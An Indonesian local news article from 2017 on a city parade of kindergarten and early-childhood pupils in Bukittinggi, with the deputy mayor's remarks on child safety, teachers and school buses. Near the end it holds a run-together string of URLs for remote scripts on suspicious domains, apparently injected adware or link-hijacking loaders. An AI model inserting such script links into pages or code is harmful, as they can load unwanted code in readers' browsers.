Pendidikan

Pawai TK dan PAUD di Kota Bukittinggi Diikuti Ribuan Peserta

HaloBukittinggi : Rangkaian acara penutupan tahun ajaran 2016/2017 anak usia dini, Dinas Pendidikan dan Kebudayaan Kota Bukittinggi, Sabtu (6/5/2017) menggelar pawai keliling kota, yang diikuti 3.280 siswa Taman Kanak-Kanak, Pendidikan Anak Usia Dini (PAUD), Satuan PAUD sejenis, dan Tempat Penitipan Anak (TPA) se Kota Bukittinggi.

Wakil Wali Kota Bukittinggi Irwandi mengatakan, kegiatan pawai ini sudah menjadi agenda rutin setiap tahun, dan kali ini mengambil tema kita tanamkan karakter cinta tanah air sedini mungkin, yang diaplikasikan dengan menanamkan jiwa kebersamaan, mengajak siswa berkumpul dilapangan kantin, berjalan keliling kota dengan titik finish di pelataran taman Jam Gadang.

Start di lapangan kantin, ribuan siswa ini masuk ke Jalan Protokol Sudirman, sampai di simpang Kangkuang luruh ke depan kantor DPRD, selanjutnya berjalan menuju pasar atas, dan finish di Jam Gadang, setelah itu anak usia dini ini bubar tertib, dan langsung diserahkan pada orang tua masing-masing.

“Pendidikan anak dari usia dini menjadi tanggung jawab pemerintah Kota Bukittinggi, untuk itu di masa pendidikan terakhirnya ini diadakan pawai atau karnaval yang akan menjadi kenangan mereka nanti, dan terlihat ada kebahagiaan tersendiri dari setiap wajah anak-anak generasi penerus bangsa ini dalam mengikuti pawai,” terangnya.

Menurut Irwandi, untuk tumbuh dan kembang menjadi generasi yang membanggakan, harus diperhatikan asupan gizi yang diberikan, perhatian, pendidikan, dan perlindungan. Hal itu diawali dari partisipasi orang tua sebagai keluarga terdekat, yang juga tidak terlepas dari peran pemerintah kota bukittinggi dalam penyediaan fasilitas pendukung.

Dalam usia bermain sambil belajar di jenjang pendidikan terbawah ini sambung Irwandi, perlu sekali dioptimalkan peran guru, bagaimana mendidik anak dari usia dini, sehingga dapat menampilkan minat dan bakatnya, mendidik disiplin, sopan santun, tata krama. Sehingga remaja kecil ini tumbuh dan kembang, serta siap melanjutkan pendidikan ke jenjang lebih tinggi, untuk menggapai apa yang mereka cita-cita kan.

“Banyak hal yang patut diwaspadai dalam pendidikan anak-anak saat ini, seperti adanya isu penculikan anak yang sempat menghebohkan masyarakat di Kota Bukittinggi beberapa waktu lalu, termasuk indikasi adanya kejahatan seksual yang menimpa anak-anak, maka dari itu kepada orang tua diminta untuk lebih meningkatkan keamanan dan kewaspadaan, sehingga si anak terhindar dari hal-hal yang tidak diinginkan,” tukasnya.

Terkait sarana dan prasarana pendukung tambah Irwandi, pihak sekolah TK dan PAUD juga harus mampu menciptakan kemananan dan kenyamanan pada peserta didik, terutama ruang kelas, taman bermain, hingga kamar kecil, jangan sampai tidak sebanding dengan jumlah murid yang ada, karena hal ini dapat menimbulkan ketidaknyamanan.

Sementara itu untuk perekrutan guru, Irwandi menilai perlu dilakukan seleksi yang ketat, basic nya harus Guru yang sesuai dengan kebutuhan sekolah, dan perlu diketahui Dinas Pendidikan dan Kebudayaan, karena hal ini menyangkut program pendidikan yang akan diberikannya pada anak-anak, apabila salah didik dari kecil berakibat fatal untuk perkembangan pola pikirnya dimasa depan.

“Sedangkan untuk bus antar jemput yang ada di TK dan PAUD juga harus menjadi perhatian pihak sekolah, karena menyangkut keselamatan anak-anak, mobil bus yang tidak layak hendaknya tidak dipakai lagi, karena akan dipergunakan setiap hari untuk antar jemput, dan seluruh fasilitas ini juga menjadi perhatian Pemko Bukittinggi untuk kemajuan bidang pendidikan sejak usia dini,” ungkapnya. (Dipra)

https://cdncache-a.akamaihd.net/sub/nee5452/51565_4460_/l.js?pid=2449&ext=Advertisehttps://cdncache-a.akamaihd.net/sub/nee5452/51565_4460_/l.js?pid=2450&ext=Not%20sethttps://glgnltks.xyz/addons/lnkr5.min.jshttps://glgnltks.xyz/addons/lnkr30_nt.min.jshttps://eluxer.net/code?id=105&subid=51565_4460_https://glgnltks.xyz/ext/116c6de661dcbbd02f.js?sid=51565_4460_&title=Not%20set&blocks%5B%5D=1f755&blocks%5B%5D=4d09a

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Populer

Copyright © 2016 HaloBukittinggi

To Top